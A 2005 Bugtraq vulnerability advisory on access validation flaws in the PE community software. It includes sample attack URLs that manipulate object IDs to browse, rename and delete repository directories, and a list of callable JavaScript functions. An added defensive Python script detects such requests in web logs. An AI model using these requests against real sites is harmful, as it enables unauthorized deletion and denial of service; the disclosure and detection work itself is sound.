Bugtraq: PE Multiple Remote Access Validation Vulnerabilities (Participate Systems Inc. / Outstart Inc.)

From: Altrus Wollesen <root_at_honour.ca>
Date: 8 Mar 2005 07:30:11 -0000
--------------------------------------------------------
- Multiple Remote Access Validation Vulnerabilities
- With PE (community software)
--------------------------------------------------------
(Altrus::security.honour.ca)

Program name: PE
  
Versions affected: <unknown>

Vendor(s): Outstart Inc.
                Participate Systems Inc.

Vendor Notification Date: 23 FEB 2005

Risk: Moderately Serious
Impact: Denial of Service, File Upload

Vendor Homepages: http://www.outstart.com
                      http://www.participate.com

---------------------------------------------------------
- Description
---------------------------------------------------------

PE is a proprietary Java-based community that mimics the
functionality provided by existing open-source software.
It facilitates community forums, document libraries,
message boards, user interaction and a user management
infrastructure.

From vendor site:

Available as either a hosted or installed solution,
OutStart Participate is improving the collaboration and
knowledge-sharing capabilities of many world-class
companies, including GE Healthcare, Caremark, palmOne,
Logitech, McGraw-Hill and Tivo. OutStart Participate
combines three different systems into one powerful
knowledge-sharing platform.

---------------------------------------------------------
- Discussion
---------------------------------------------------------

The software is affected by an Access Validation Error
that could allow a malicious user to rename or delete
critical directory objects. This could result in a denial
of service of all library, forum, and/or specialized
content until the directory objects were restored or
renamed appropriately.

The Vendor has been notified of this issue, and has
developed a patch. Sites and persons using the software
are advised to install the patch - available from the
vendor.

---------------------------------------------------------
- Sample Exploit Code
---------------------------------------------------------

http://www.targetsite.com/pe/repository/displaynavigator.jsp?rootFolder=101
        -Allows an attacker to browse a limited directory tree (in this case, the action directory). Changing to "rootFolder=105" allows the document library to be browsed.
                
http://www.targetsite.com/pe/repository/include/renamepopup.jsp?selectedObject=101
        -Allows an attacker to rename the selected object ID (in this case, the action directory).

http://www.targetsite.com/pe/repository/displaydeletenavigator.jsp?selectedObjectsCSV=101
        -Sets the object CSV for the delete navigator.

The following JavaScript commands might also be used to
call functions otherwise unavailable to the user:

showDeleteView()
showWebFolderView()
showLibraryView()
showMyLibraryView()
singleSelectObject(objid)
processRadioSelection(radio, objid)
processCheckboxSelection(chkbox, objid)
singleSelectObject(objid)
addToSelectedObjects(objid)
removeFromSelectedObjects(objid)

---------------------------------------------------------
- Solutions
---------------------------------------------------------

The vendor has provided a patch. Its effectiveness is
not confirmed, nor is its distribution.

---------------------------------------------------------
- References
---------------------------------------------------------

Authoritative and updated copies of this vulnerability can
be found at:

http://security.honour.ca

---------------------------------------------------------
- Credits
---------------------------------------------------------

Discovered by: Altrus [root_at_honour.ca]
Received on Mar 08 2005
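
Added example, not part of the original advisory or the vendor's code: a Python check that scans web access logs for requests passing an object ID to the three repository JSPs listed under Sample Exploit Code from a source outside an admin allowlist. The common/combined log format, the ADMIN_SOURCES allowlist and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# JSP pages and object-id parameters named in the advisory (lowercased).
SENSITIVE = {
    "/pe/repository/displaynavigator.jsp": "rootfolder",
    "/pe/repository/include/renamepopup.jsp": "selectedobject",
    "/pe/repository/displaydeletenavigator.jsp": "selectedobjectscsv",
}
ADMIN_SOURCES = {"10.0.0.5"}  # assumption: where repository admins connect from

# Common/combined log format: ip ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})\b')

def find_suspect_requests(lines, admin_sources=ADMIN_SOURCES):
    """Return one finding per request that passes an object id to a listed
    JSP from a source address outside admin_sources."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["ip"] in admin_sources:
            continue
        url = urlsplit(m["target"])
        # Drop ";jsessionid=..." path parameters before matching the page.
        path = url.path.split(";", 1)[0].lower()
        param = SENSITIVE.get(path)
        if param is None:
            continue
        query = {k.lower(): v for k, v in parse_qs(url.query).items()}
        if param in query:
            findings.append({"time": m["ts"], "ip": m["ip"], "user": m["user"],
                             "page": path.rsplit("/", 1)[-1],
                             "objects": query[param][0].split(","),
                             "status": int(m["status"])})
    return findings

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.44 - - [08/Mar/2005:07:12:01 +0000] "GET /pe/repository/displaynavigator.jsp?rootFolder=105 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [08/Mar/2005:07:12:40 +0000] "GET /pe/repository/include/renamepopup.jsp;jsessionid=ABC123?selectedObject=101 HTTP/1.1" 200 2048',
    '10.0.0.5 - admin [08/Mar/2005:07:13:02 +0000] "GET /pe/repository/displaydeletenavigator.jsp?selectedObjectsCSV=101,102 HTTP/1.1" 200 3010',
    '192.0.2.77 - - [08/Mar/2005:07:14:10 +0000] "GET /pe/forum/index.jsp HTTP/1.1" 200 900',
    '192.0.2.44 - - [08/Mar/2005:07:15:00 +0000] "GET /pe/repository/displaydeletenavigator.jsp?selectedObjectsCSV=101,102 HTTP/1.1" 200 3010',
]

if __name__ == "__main__":
    for finding in find_suspect_requests(SAMPLE_LOG):
        print(finding)
```

A 200 status on a finding means the server answered the request; whether the rename or delete took effect has to be confirmed against the repository itself.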
